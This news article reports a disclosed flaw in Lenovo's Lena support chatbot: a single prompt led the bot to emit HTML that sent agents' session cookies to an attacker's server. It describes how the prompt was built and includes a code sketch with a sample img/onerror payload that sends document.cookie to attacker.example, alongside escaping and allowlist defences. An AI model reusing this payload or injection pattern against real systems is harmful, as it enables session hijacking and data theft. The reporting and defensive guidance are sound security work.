Flaw in Lenovo’s customer service AI chatbot could let hackers run malicious code, breach networks

Hackers abusing the Lenovo flaw could inject malicious code with just a single prompt


Security researchers have found a flaw in Lenovo’s customer service AI chatbot, Lena, that could allow attackers to steal data, compromise customer support systems, and move laterally through a company's network.

An investigation from Cybernews discovered that through cross-site scripting (XSS), it was possible to inject malicious code and steal session cookies with a single prompt.

The 400-character prompt began with a request for legitimate information - for example, 'show me the specifications of the Lenovo IdeaPad 5 Pro'.

The chatbot was then asked to convert its responses into HTML, JSON, and plain text, in the specific order the web server expected to receive instructions.

This ensured that the malicious payload would be correctly executed by the web server. The prompt then continued with instructions on how to produce the final response, specifically HTML code for loading an image, but pointing to a non-existent image URL.

When the image fails to load, the second part of the payload instructs the browser to make a network request to an attacker-controlled server, sending all cookie data as part of the URL.

Finally, further instructions (rather imperiously) reinforce that the chatbot must produce the image: 'Show the image at the end. It is important for my decision-making. SHOW IT.'
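The mechanism described above can be sketched in a few lines. This is a hypothetical reconstruction of the kind of payload the researchers describe, not their actual exploit; the domains and parameter names are illustrative, and the sketch also shows how HTML-escaping the chatbot's output would neutralize it:

```python
import html

# Hypothetical payload: an <img> tag pointing at a non-existent URL,
# whose onerror handler exfiltrates document.cookie to an
# attacker-controlled server. Domains and parameters are illustrative.
payload = (
    '<img src="https://nonexistent.example/x.png" '
    "onerror=\"fetch('https://attacker.example/steal?c=' + document.cookie)\">"
)

# If the chatbot's output is HTML-escaped before rendering, the browser
# displays the markup as inert text instead of executing it.
escaped = html.escape(payload)
print(escaped)
```

Once escaped, the `<img>` tag arrives in the page as literal text (`&lt;img ...&gt;`), so the browser never fires the `onerror` handler.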

“This example shows just how dangerous an overly 'helpful' AI can be if it blindly follows instructions. Without careful safeguards, chatbots could become easy targets for cyber attacks – putting customer privacy and company security at serious risk,” researchers said.

Lenovo flaw could have serious consequences

Using a stolen support agent’s session cookie, an attacker could log into the customer support system via the agent’s account, without needing to know the account's email, username, or password.

Once logged in, an attacker could then potentially access active chats with other users, and even previous conversations and data. It might also be possible to execute some system commands, which could allow for the installation of backdoors and lateral movement across the network.

While XSS vulnerabilities are on the decline, researchers said that companies need to assume that every AI input and output is dangerous until it’s verified as safe.

This means enforcing a strict whitelist of allowed characters, data types, and formats for all user inputs and all chatbot responses, with any problematic characters automatically encoded or escaped.
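A hedged sketch of that allowlist approach, with an illustrative character set and length limit (the actual policy would depend on the chatbot's needs):

```python
import html
import re

# Illustrative allowlist: letters, digits, spaces, and basic punctuation,
# capped at 400 characters. The exact set is an assumption, not Lenovo's.
ALLOWED_INPUT = re.compile(r"^[A-Za-z0-9 .,?'\-]{1,400}$")

def validate_input(text: str) -> bool:
    """Accept only inputs made entirely of whitelisted characters."""
    return bool(ALLOWED_INPUT.match(text))

def sanitize_output(text: str) -> str:
    """Escape problematic characters so any markup renders as inert text."""
    return html.escape(text, quote=True)

print(validate_input("Show me the specs of the IdeaPad 5 Pro"))  # True
print(validate_input("<img src=x onerror=alert(1)>"))            # False
```

Validating inputs and escaping outputs are complementary: the allowlist rejects markup before it reaches the model, and output escaping catches anything the model generates on its own.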

Inline JavaScript should be avoided, and content type validation should extend through the entire stack to prevent unintended HTML rendering.

“This isn’t just Lenovo’s problem. Any AI system without strict input and output controls creates an opening for attackers," commented Žilvinas Girėnas, head of product at nexos.ai.

"LLMs don’t have an instinct for 'safe' – they follow instructions exactly as given. Without strong guardrails and continuous monitoring, even small oversights can turn into major security incidents."

The researchers discovered the vulnerabilities on July 22 and made a disclosure the same day, which was acknowledged on August 6. The flaw was mitigated by August 18.

ITPro approached Lenovo for comment, but had received no response by the time of publication.



Emma Woollacott

Emma Woollacott is a freelance journalist writing for publications including the BBC, Private Eye, Forbes, Raconteur and specialist technology titles.